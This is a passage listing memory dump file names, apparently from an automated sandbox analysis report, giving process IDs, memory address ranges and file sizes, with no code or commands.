memory/5096-471-0x0000000000000000-mapping.dmp
-
memory/5104-240-0x000001823EF94000-0x000001823EF95000-memory.dmpFilesize
4KB
-
memory/5104-221-0x000001825C090000-0x000001825C10E000-memory.dmpFilesize
504KB
-
memory/5104-190-0x0000000000000000-mapping.dmp
-
memory/5104-195-0x000001823EA10000-0x000001823EA11000-memory.dmpFilesize
4KB
-
memory/5104-198-0x000001823EE80000-0x000001823EE8B000-memory.dmpFilesize
44KB
-
memory/5104-200-0x000001823EF90000-0x000001823EF92000-memory.dmpFilesize
8KB
-
memory/5104-237-0x000001823EF92000-0x000001823EF94000-memory.dmpFilesize
8KB
-
memory/5104-243-0x000001823EF95000-0x000001823EF97000-memory.dmpFilesize
8KB
-
memory/5144-365-0x0000000008090000-0x0000000008091000-memory.dmpFilesize
4KB
-
memory/5144-323-0x0000000004CB0000-0x0000000004CB1000-memory.dmpFilesize
4KB
-
memory/5144-361-0x0000000007D20000-0x0000000007D21000-memory.dmpFilesize
4KB
-
memory/5144-330-0x0000000004CB2000-0x0000000004CB3000-memory.dmpFilesize
4KB
-
memory/5144-321-0x0000000004C70000-0x0000000004C71000-memory.dmpFilesize
4KB
-
memory/5144-295-0x0000000000000000-mapping.dmp
-
memory/5144-364-0x0000000007DC0000-0x0000000007DC1000-memory.dmpFilesize
4KB
-
memory/5144-325-0x00000000076A0000-0x00000000076A1000-memory.dmpFilesize
4KB
-
memory/5148-516-0x0000000000000000-mapping.dmp
-
memory/5212-458-0x0000000000000000-mapping.dmp
-
memory/5220-395-0x0000000000000000-mapping.dmp
-
memory/5268-303-0x0000000000000000-mapping.dmp
-
memory/5292-451-0x0000000000000000-mapping.dmp
-
memory/5392-469-0x0000000000000000-mapping.dmp
-
memory/5436-384-0x0000000000000000-mapping.dmp
-
memory/5536-336-0x0000000000BA0000-0x0000000000CFE000-memory.dmpFilesize
1.4MB
-
memory/5536-326-0x0000000000000000-mapping.dmp
-
memory/5548-327-0x0000000000000000-mapping.dmp
-
memory/5576-329-0x0000000000000000-mapping.dmp
-
memory/5576-362-0x0000000004D02000-0x0000000004D03000-memory.dmpFilesize
4KB
-
memory/5576-357-0x0000000004D00000-0x0000000004D01000-memory.dmpFilesize
4KB
-
memory/5732-343-0x000000000041047E-mapping.dmp
-
memory/5732-349-0x0000000004EE0000-0x0000000004EE1000-memory.dmpFilesize
4KB
-
memory/5732-341-0x0000000000400000-0x0000000000418000-memory.dmpFilesize
96KB
-
memory/5804-444-0x0000000000000000-mapping.dmp
-
memory/5844-403-0x0000000000000000-mapping.dmp
-
memory/6008-407-0x0000000000000000-mapping.dmp
-
memory/6012-479-0x0000000000000000-mapping.dmp
-
memory/6012-446-0x0000000000000000-mapping.dmp
-
memory/6028-378-0x0000000000BD0000-0x0000000000C63000-memory.dmpFilesize
588KB
-
memory/6028-379-0x0000000000400000-0x0000000000945000-memory.dmpFilesize
5.3MB
-
memory/6028-363-0x0000000000000000-mapping.dmp
-
memory/6092-421-0x0000000000000000-mapping.dmp
-
memory/6108-459-0x0000000000000000-mapping.dmp
-
memory/6112-422-0x0000000000000000-mapping.dmp
-
memory/6120-463-0x0000000000000000-mapping.dmp